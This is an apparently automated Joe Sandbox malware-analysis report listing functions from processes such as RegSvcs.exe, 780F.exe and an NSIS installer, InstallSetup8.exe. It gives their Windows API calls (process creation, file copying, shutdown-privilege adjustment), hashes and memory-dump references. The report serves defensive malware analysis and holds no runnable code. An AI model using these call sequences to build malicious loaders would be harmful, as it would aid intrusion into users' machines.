Opcode ID: 72b42199c27b0fb8cfddc3f5f45d92b163ef51fe62ec1fd28493155f6c9ce543
Instruction ID: 403a54d1b97d2de2ec18dc9773c44ddcd62ad649dc12cb90f62a815256474269
Opcode Fuzzy Hash: 72b42199c27b0fb8cfddc3f5f45d92b163ef51fe62ec1fd28493155f6c9ce543
Instruction Fuzzy Hash: 28E030714163416AD704DFA0E951BABB3B49F9564CF208A2DE45D41A90F730D60CC563

Uniqueness

Uniqueness Score: -1.00%

Function 6CE83640 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE83676
__CxxThrowException@8.LIBCMT ref: 6CE8368D

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

Strings

0Bl, xrefs: 6CE83685

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: caffb817a3583036a8859eb0de57c071fa7d330a9827c8c7239411c5bac8e07f
Instruction ID: cc4738ae019dcc9f39c2e2e09c5c101a3f20a2955add021dd98211464ef67f77
Opcode Fuzzy Hash: caffb817a3583036a8859eb0de57c071fa7d330a9827c8c7239411c5bac8e07f
Instruction Fuzzy Hash: C3E065B14063016AD304DBA4D555AABB3F4AF9175CF34892CE85D42B94FB30D60CD563

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5B050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE5B086
__CxxThrowException@8.LIBCMT ref: 6CE5B09D

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

Strings

0Bl, xrefs: 6CE5B095

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: 589ba7e1aa65d5e6c0be194e2a500a88da850d30c3bd21a2f2ff1aef3d62b20c
Instruction ID: 81a94d19a58073d34ac19fe2e87eae853424570975c3af9e1bc06b8f93a23c28
Opcode Fuzzy Hash: 589ba7e1aa65d5e6c0be194e2a500a88da850d30c3bd21a2f2ff1aef3d62b20c
Instruction Fuzzy Hash: 4AE09B72815301A6D208DBA0E9516AFB3F49F5074CF644E3CE55E41BC0EB31D51CC567

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3C4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 6CE3C4A4
VariantCopy.OLEAUT32(00000000,/5l), ref: 6CE3C4AF

Strings

/5l, xrefs: 6CE3C4AA, 6CE3C4AD

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$CopyInit
String ID: /5l
API String ID: 4248132287-2072523891
Opcode ID: 922c9e05501f3736cda7b9b0860881abd59727989b352e29271507c5ec7f2c38
Instruction ID: 21c12a52ef638162a8e0a8fc3cf050815573bc7e284ab2e6994af391313e445f
Opcode Fuzzy Hash: 922c9e05501f3736cda7b9b0860881abd59727989b352e29271507c5ec7f2c38
Instruction Fuzzy Hash: A3D012763006246B56017AE5DC0CDDF777CDF226817145012FA04C2700DB38D514A6EA

Uniqueness

Uniqueness Score: -1.00%

Function 6CE37680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,CB65479A), ref: 6CE376AD
LeaveCriticalSection.KERNEL32(?,?,?,CB65479A), ref: 6CE376FF
EnterCriticalSection.KERNEL32(CB65479A,?,?,?,CB65479A), ref: 6CE3770D
LeaveCriticalSection.KERNEL32(CB65479A,?,00000000,?,?,?,?,CB65479A), ref: 6CE3772A

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

Part of subcall function 6CE36D40: _rand.LIBCMT ref: 6CE36DEA

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: CriticalSection$EnterLeave$_malloc_rand
String ID:
API String ID: 119520971-0
Opcode ID: a6779bd2ed64250b1f2dc1c48705338965036ed13c5e846d25537cb49493ed37
Instruction ID: 73df20d42848f48f6efcd258a5e296ca0c1b4ee14608aa712622e958a0c79ffe
Opcode Fuzzy Hash: a6779bd2ed64250b1f2dc1c48705338965036ed13c5e846d25537cb49493ed37
Instruction Fuzzy Hash: B3218671500619EFC710DF95DD84ADFB7BCFF41254F20562AE81597A40EB70B905C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE39580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?), ref: 6CE395A9
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6CE395CA
EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CE395DA
LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6CE395FB

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 74bb2d28c1cee58825f4bbc25b774ec21c8c40bbb5a9da950ec72e1de8d4ccab
Instruction ID: 7d210fef629f0e397922d620028671b85d38d6aab6159b7d8aaf6cbafca9d29c
Opcode Fuzzy Hash: 74bb2d28c1cee58825f4bbc25b774ec21c8c40bbb5a9da950ec72e1de8d4ccab
Instruction Fuzzy Hash: D8119D32A05118EFCB00CF99E8848DEF7B8FF51218B20519AE41997A10DB70FA55DBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 7932, Parent PID: 7792COMMON

Executed Functions

Function 0109DEA8 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3087749311.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1090000_RegSvcs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d0f6ac5cf408a9745463cada37e1e7f982738bb6cfdcb2a1776c7ea0a97e7ce6
Instruction ID: d9e566e8f807efe0b0c12a930846be453de4133a0aa2ec5f82b343c0784bcac5
Opcode Fuzzy Hash: d0f6ac5cf408a9745463cada37e1e7f982738bb6cfdcb2a1776c7ea0a97e7ce6
Instruction Fuzzy Hash: DC714470A00B058FDB64DF6AD56179ABBF1FF88300F00896EE48A8BA50D735E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0109899D Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01098A59

Memory Dump Source

Source File: 00000008.00000002.3087749311.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1090000_RegSvcs.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5337452cc3f25e4cc2b8e771888d8eb4be845081cd58eff89b1665a229bb0f65
Instruction ID: 02ec70e186d25c0d603b01f587ae42740ca91a9fa4ad790cbbedcff97d89920b
Opcode Fuzzy Hash: 5337452cc3f25e4cc2b8e771888d8eb4be845081cd58eff89b1665a229bb0f65
Instruction Fuzzy Hash: 9041E0B0C0061DCBDB24CFA9C844ADEBBF5FF49314F24819AD448AB251DB756986CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01096EA8 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01098A59

Memory Dump Source

Source File: 00000008.00000002.3087749311.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1090000_RegSvcs.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7ee310aa2470da0a45afaa703872bf7f2a174e080049754307f472500e7ca199
Instruction ID: 22f82e2f1544e1eee7ae990659e876d2ef437e4e14a150a4a6b7f2c905042b21
Opcode Fuzzy Hash: 7ee310aa2470da0a45afaa703872bf7f2a174e080049754307f472500e7ca199
Instruction Fuzzy Hash: A741DFB0C0061DCADB24CFA9C844B9EBBF5BF49314F2480AAD448AB255DB756986CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0109E318 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0109E179,00000800,00000000,00000000), ref: 0109E38A

Memory Dump Source

Source File: 00000008.00000002.3087749311.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1090000_RegSvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1116778874cdaf3f4062592ec96c3724c7bf3304922467ca6a5e897612225d25
Instruction ID: 003d685fd9955b46fb1955992fd34e3f5a1748a4fec277715976acd6586d9c87
Opcode Fuzzy Hash: 1116778874cdaf3f4062592ec96c3724c7bf3304922467ca6a5e897612225d25
Instruction Fuzzy Hash: DE1112B69002499FDB10CFAAD448ADEFBF4EB48320F10856AD559A7210C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0109DBB8 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0109E179,00000800,00000000,00000000), ref: 0109E38A

Memory Dump Source

Source File: 00000008.00000002.3087749311.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1090000_RegSvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a69154a908867e1e226e60c70b0762a12cd11b3cc7711a5c5d55a3256e6ca850
Instruction ID: 4cb7771e97c46289b918e813e2a7f44125f46f0a91861a6723c40172e98fba7d
Opcode Fuzzy Hash: a69154a908867e1e226e60c70b0762a12cd11b3cc7711a5c5d55a3256e6ca850
Instruction Fuzzy Hash: 3D11E2B6900349DFDB10CFAAD448ADEFBF4EB48324F10C46AE559A7210C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0109C918 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0109DEC4), ref: 0109E0FE

Memory Dump Source

Source File: 00000008.00000002.3087749311.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1090000_RegSvcs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 02e534b2b60d88b82c35624f2f833885d02711a3c4d32b997f2bb7332ded7840
Instruction ID: d5e35fe00db840037bac4864f942f404c570f26e8720cbf9d25ce51fc510b403
Opcode Fuzzy Hash: 02e534b2b60d88b82c35624f2f833885d02711a3c4d32b997f2bb7332ded7840
Instruction Fuzzy Hash: 131120B1800308CBDB10CF9AC444BDEFBF4AB88324F10846AE558A7210C375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DDD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3074099450.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ddd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e5a5ca9559555027d66ea6b3923773ce606ad936fd9b64d17e9936028f01fc1
Instruction ID: c569382a29c285b1e454ed398a0288cab5b556396baf3e94b63ac3ad4a0f618f
Opcode Fuzzy Hash: 8e5a5ca9559555027d66ea6b3923773ce606ad936fd9b64d17e9936028f01fc1
Instruction Fuzzy Hash: 8921FF71544240EFCF15DF14E980B2ABF66FB98318F24C66AE8490A356C336D856CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00DED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3075343150.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ded000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60f66ee3a086ee40ea91bf7a1205a22ece65f51911c7cf7087a8a5cafb8c5da8
Instruction ID: 268e2ed1f6914781503a202e08eca91a83b99ffd08661f429e311e454bfc37b9
Opcode Fuzzy Hash: 60f66ee3a086ee40ea91bf7a1205a22ece65f51911c7cf7087a8a5cafb8c5da8
Instruction Fuzzy Hash: 0621F271604280DFCB14EF15D984B26BBA6FB84314F28C569E84A4B296CB3AD847CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00DED005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3075343150.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ded000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b2eaf60a358a1bccf55cadfe03702151b725111d50d13a579937db72dd96b73
Instruction ID: 543c8db8f59f5abded5555657df3c4dc7e25761069327819ba6ebe8dff1280f3
Opcode Fuzzy Hash: 7b2eaf60a358a1bccf55cadfe03702151b725111d50d13a579937db72dd96b73
Instruction Fuzzy Hash: 71215E755093C08FDB12DF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00DDD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3074099450.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ddd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: ba22e4a97afa4cb55dab8fb43eb5c6a0b00d486919bdf7d58a57140827b30a15
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 7C11B176504280DFCF16CF14D5C4B16BF72FB94318F28C6AAD8490B656C336D85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01092B28 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3087749311.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1090000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9569a2b70c9cf49504e3a40df8c988efe18a6f369618859946b2ca4978586d0
Instruction ID: 500de88a0e574ea6d79be6b51668769e977452c03d37f6cb9137a1af0c2d9d2f
Opcode Fuzzy Hash: e9569a2b70c9cf49504e3a40df8c988efe18a6f369618859946b2ca4978586d0
Instruction Fuzzy Hash: 4B010C74904249EFCB40EFA8D9449AEBFF5FF09311F1481A6E895EB391D7309A40DBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 780F.exePID: 8040, Parent PID: 2580COMMON

Executed Functions

Function 020E0AD8 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

8bq, xrefs: 020E0D1F

Memory Dump Source

Source File: 00000009.00000002.2097873084.00000000020E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20e0000_780F.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 373a82f5c4156a81fb1190e26d8e88da9c162209e1b1cc004a71696edfa1fbe8
Instruction ID: 21936114d5b49fe033ca25f593473d706d11d84ecc1d79ad06901506f698ee3b
Opcode Fuzzy Hash: 373a82f5c4156a81fb1190e26d8e88da9c162209e1b1cc004a71696edfa1fbe8
Instruction Fuzzy Hash: CA71E3347403419FCB55DB38D488B2ABBE7FB84318F558469D84AAB391DB74EC81DB81

Uniqueness

Uniqueness Score: -1.00%

Function 020E0590 Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2097873084.00000000020E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20e0000_780F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c70d491cd9c5f42af1a55348f39c6cb9af5f27333f339e103eaf758947f5d1b
Instruction ID: f1c1078ac9d07fbdbcf10f8255085d71100b30468c8060b2350209857a1aade6
Opcode Fuzzy Hash: 6c70d491cd9c5f42af1a55348f39c6cb9af5f27333f339e103eaf758947f5d1b
Instruction Fuzzy Hash: C0813E3890134ACFCB05DFB4D694A9EBBB6FF45308F2045A9C414AB354DB3A9D46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 020E0848 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2097873084.00000000020E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20e0000_780F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e752e31a9e7eaf6237d24f39ccaf4dfe2c7aaf3bf901efb3f3ed8b40e815e720
Instruction ID: c00e9ed11452b00fb92791a6e761f0365b06bda2c8c8701561795ae4beb8401c
Opcode Fuzzy Hash: e752e31a9e7eaf6237d24f39ccaf4dfe2c7aaf3bf901efb3f3ed8b40e815e720
Instruction Fuzzy Hash: 68710C3890130ACFCB05DF74D694A9EBBB6FF45308F604568C414AB354DB3A9D46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 020E0D60 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2097873084.00000000020E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20e0000_780F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fba90c12d1c6d20203dfee6b42b2996e3b5362e99a225f3e8a9f9ce9b12a120
Instruction ID: fc56ce4d5c2424d693532d825dd6187850792eae82a396ceb6a62f6645a26edd
Opcode Fuzzy Hash: 6fba90c12d1c6d20203dfee6b42b2996e3b5362e99a225f3e8a9f9ce9b12a120
Instruction Fuzzy Hash: C531D2317053964FCB02DB6DD4809AEBFF6EB85214B0441A6D45AEB242CB74ED85CB92

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: InstallSetup8.exePID: 8092, Parent PID: 8040COMMON

Non-executed Functions

Function 00403532 Relevance: 72.2, APIs: 32, Strings: 9, Instructions: 464stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000,?,00000008,0000000A,0000000C), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,00441800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNEL32(00441000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(00441800,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32(?,~nsu%X.tmp,00000001,00435000,?,00441800,0043F000,00000000,?,?,00000008,0000000A,0000000C), ref: 004039B1
GetFileAttributesW.KERNEL32(00437800,00441800), ref: 004039E4
DeleteFileW.KERNEL32(00437800), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

CopyFileW.KERNEL32(00442800,00437800,00000001,00441800,00000000), ref: 00403A34

Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNEL32(00009292,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270,00009292,?,00441800,00405C83,?,00009292,00441800), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?,?,?,?,?,?,?,?,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002,00000004,?,?,?,?,?,?,?,?), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNEL32(?,00000000,00403525,00441800,00441800,00441800,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

TMP, xrefs: 00403862
